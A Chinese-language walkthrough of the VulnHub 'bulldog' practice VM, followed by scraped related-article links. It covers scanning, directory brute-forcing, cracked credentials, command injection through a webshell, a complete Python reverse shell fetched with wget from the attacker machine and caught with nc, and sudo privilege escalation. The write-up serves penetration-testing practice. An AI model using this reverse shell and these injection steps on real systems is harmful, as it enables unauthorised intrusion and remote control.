配置环境
bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip
ip:192.168.56.101

点开vmware中的虚拟选项编辑器中
点击更改设置,让vmware桥接至VirtualBox Host-Only Ethernet Adapter

kali在VMware下运行,设置成桥接模式
打开,查看ip :192.168.56.102
使用nmap -sS 192.168.56.0/24扫描主机
然后nmap -PS 192.168.56.101,扫描端口

在kali火狐访问192.168.56.101,没发现重要信息
使用dirb扫描目录
出现admin和dev目录

访问admin目录,发现是个登录框
访问dev目录,查看源码

MD5解密,只有最后两个能解,分别是bulldog和bulldoglover
尝试登录,不成功
使用密码前面的邮箱登录不成功,使用账号nick密码bulldog登录成功
然后访问webshell
发现可以使用命令执行漏洞
在kali 文件编辑一个python文件为shell.py

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“192.168.56.102”,1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

保存到主目录下
然后python启动http服务
python3是:python -m http.server 80
python2是:python -m SimpleHTTPServer 80

启动服务后,在webshell页面执行命令

ls & wget http://192.168.56.102/shell.py 在bulldog靶机上下载shell.py

然后在kali 上运行nc -lvnp 1234 ,监听1234端口,
然后在webshell里运行命令
pwd&python shell.py
nc成功




每一个单词去掉H,组合起来,就是密码SUPERultimatePASSWORDyouCANTget

执行命令:
sudo python -c ‘import pty;pty.spawn("/bin/bash")’
上面命令是 提权并进行python shell
组后提权成功
cd /root
ls

cat congrats.txt

vulnhub bulldog相关推荐

  1. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  2. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  3. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  4. 【Bulldog】靶场记录

    前言: 漏洞复现有点乏味并且时效性不强,所以我就开始下载vulnhub上的靶场进行练习,但是操作自己是了解的,就是想不到这种方法,还是靶场练习的太少了,所以本人要坚持练习靶场,然后把练习过程记录下来, ...

  5. vulnhub——Bulldog1

    攻击机:kali linux 目标靶机:Bulldog1(可在vulnhub中搜索下载) 目录 壹 信息收集 one 查看kali的IP地址 ​two 主机发现 three 端口扫描 贰 渗透测试 o ...

  6. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  7. bulldog靶机练习思路详解

    下载靶机,在虚拟机中打开 下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 主机扫描nmap,发现目标主机与其开放的端口 在浏览器打开网站,只 ...

  8. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  9. (Vulnhub练习)--Bulldog1渗透实战

    (Vulnhub练习)–Bulldog1渗透实战 下载地址 http://www.vulnhub.com/entry/bulldog-1,211/ 文章转载 靶机渗透测试实战(三)--Bulldog1 ...

最新文章

  1. 参加UI培训后可以找什么工作
  2. 2021-10-16 集合(set)与映射(map) 恋上数据结构笔记
  3. JZOJ 5177. 【NOIP2017提高组模拟6.28】TRAVEL
  4. java实现base64加密解密
  5. 批量导出部分依赖图(PDP)
  6. winpe制作u盘启动盘_怎么制作u盘启动盘 u盘启动盘制作方法【介绍】
  7. 浪潮ai服务器最新数据,浪潮发布的最新AI服务器,将GPU资源利用率提升至前所未有的水平...
  8. 平民价国产Android,1600左右的Broncho A1真机配置
  9. win7系统两台电脑之间利用Socket实现文件传输---C++实现
  10. oreo另一个意思_other和another区别:两种不同的“另一个”
  11. NE555脉冲模块电路
  12. 安装了一下WinZip,感觉很难用
  13. suse linux 使用教程,suse linux 命令教程
  14. 设计模式系列 — 模板方法模式
  15. b样条和三次样条_B样条(贝塞尔曲线和b样条曲线)
  16. 【机房报修管理系统】1.简介篇 机房报修管理系统简介
  17. C语言求阶乘尾数零的个数
  18. 一次Linux中的木马病毒解决经历
  19. 解决Manifest merger failed : Attribute application@appComponentFactory
  20. Seastar Tutorial 简明教程

热门文章

  1. Android EditText输入光标居于开头最开始位置
  2. 数字孪生 应急管理可视化决策系统
  3. hadoop之hdfs及其工作原理
  4. uniapp公共测试证书签名
  5. 数据分析 --- 如何分析数据
  6. Vim的几个高级玩法
  7. Linux系列:花括号{}的使用
  8. TL431和PC817在开关电源中的工作详解
  9. 数据库系列7:事务与锁的实现原理
  10. 4748——微积分基本定理12